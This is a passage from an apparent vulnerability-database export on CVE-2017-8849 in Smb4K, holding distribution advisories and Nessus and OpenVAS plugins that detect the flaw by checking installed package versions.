script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"smb4k on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 1.2.1-2~deb8u1.\n\nWe recommend that you upgrade your smb4k packages.\");\n script_tag(name:\"summary\", value:\"Sebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed 
software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"smb4k\", ver:\"1.2.1-2~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Smb4K is an SMB/CIFS share browser for KDE. It uses the Samba software suite to access the SMB/CIFS shares of the local network neighborhood. Its purpose is to provide a program that's easy to use and has as many features as possible. ", "modified": "2017-05-20T12:32:34", "published": "2017-05-20T12:32:34", "id": "FEDORA:E6C176051745", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: smb4k-1.2.2-3.fc25", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Smb4K is an SMB/CIFS share browser for KDE. It uses the Samba software suite to access the SMB/CIFS shares of the local network neighborhood. Its purpose is to provide a program that's easy to use and has as many features as possible. ", "modified": "2017-06-09T19:38:34", "published": "2017-06-09T19:38:34", "id": "FEDORA:EA4816048681", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: smb4k-1.2.2-3.fc26", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Smb4K is an SMB/CIFS share browser for KDE. It uses the Samba software suite to access the SMB/CIFS shares of the local network neighborhood. Its purpose is to provide a program that's easy to use and has as many features as possible. 
", "modified": "2017-05-22T06:52:26", "published": "2017-05-22T06:52:26", "id": "FEDORA:8DC72601E838", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: smb4k-1.2.2-3.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T09:38:24", "description": "Sebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper\nbinary does not properly verify the mount command it is being asked to\nrun.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n'Stretch'.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.2.1-2~deb7u1.\n\nWe recommend that you upgrade your smb4k packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-26T00:00:00", "title": "Debian DLA-1002-1 : smb4k security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-06-26T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:smb4k"], "id": "DEBIAN_DLA-1002.NASL", "href": "https://www.tenable.com/plugins/nessus/101033", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1002-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101033);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-8849\");\n\n script_name(english:\"Debian DLA-1002-1 : smb4k security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper\nbinary does not properly verify the mount command it is being asked to\nrun.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n'Stretch'.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.2.1-2~deb7u1.\n\nWe recommend that you upgrade your smb4k packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00031.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/smb4k\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected smb4k package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif 
(!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"smb4k\", reference:\"1.2.1-2~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:15:07", "description": "Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "title": "Fedora 26 : smb4k (2017-f7849e04f4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-07-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:smb4k", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-F7849E04F4.NASL", "href": "https://www.tenable.com/plugins/nessus/101747", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f7849e04f4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101747);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"FEDORA\", value:\"2017-f7849e04f4\");\n\n script_name(english:\"Fedora 26 : smb4k (2017-f7849e04f4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f7849e04f4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-2.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected smb4k package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright 
(C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"smb4k-1.2.2-3.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smb4k\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:50", "description": "Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", 
"edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-23T00:00:00", "title": "Fedora 24 : smb4k (2017-aceb424894)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-05-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:smb4k", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-ACEB424894.NASL", "href": "https://www.tenable.com/plugins/nessus/100334", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-aceb424894.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100334);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"FEDORA\", value:\"2017-aceb424894\");\n\n script_name(english:\"Fedora 24 : smb4k (2017-aceb424894)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-aceb424894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-2.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the 
affected smb4k package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"smb4k-1.2.2-3.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smb4k\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:15:43", "description": "Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-22T00:00:00", "title": "Fedora 25 : smb4k (2017-2cc18e2b3b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-05-22T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:smb4k"], "id": "FEDORA_2017-2CC18E2B3B.NASL", "href": "https://www.tenable.com/plugins/nessus/100308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-2cc18e2b3b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n 
script_id(100308);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"FEDORA\", value:\"2017-2cc18e2b3b\");\n\n script_name(english:\"Fedora 25 : smb4k (2017-2cc18e2b3b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-8849.\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-2cc18e2b3b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-2.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected smb4k package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"smb4k-1.2.2-3.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smb4k\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:06:03", "description": "The remote host is affected by the vulnerability described in GLSA-201705-14\n(Smb4K: Arbitrary command execution as root)\n\n Smb4k contains a logic flaw in which mount helper binary does not\n properly verify the mount command it is being asked to run.\n \nImpact :\n\n A local user can execute commands with the root privilege due to the\n mount helper being installed as suid.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "title": "GLSA-201705-14 : Smb4K: Arbitrary command execution as root", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-05-26T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:smb4k"], "id": "GENTOO_GLSA-201705-14.NASL", "href": "https://www.tenable.com/plugins/nessus/100446", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201705-14.\n#\n# 
The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100446);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"GLSA\", value:\"201705-14\");\n\n script_name(english:\"GLSA-201705-14 : Smb4K: Arbitrary command execution as root\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201705-14\n(Smb4K: Arbitrary command execution as root)\n\n Smb4k contains a logic flaw in which mount helper binary does not\n properly verify the mount command it is being asked to run.\n \nImpact :\n\n A local user can execute commands with the root privilege due to the\n mount helper being installed as suid.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201705-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Smb4K users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/smb4k-1.2.3-r1:4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/smb4k\", unaffected:make_list(\"ge 1.2.3-r1\"), vulnerable:make_list(\"lt 1.2.3-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Smb4K\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:32:51", "description": "This update for smb4k fixes the following issues :\n\n - Disabled dbus service and polkit rules, because this\n version of smb4k 
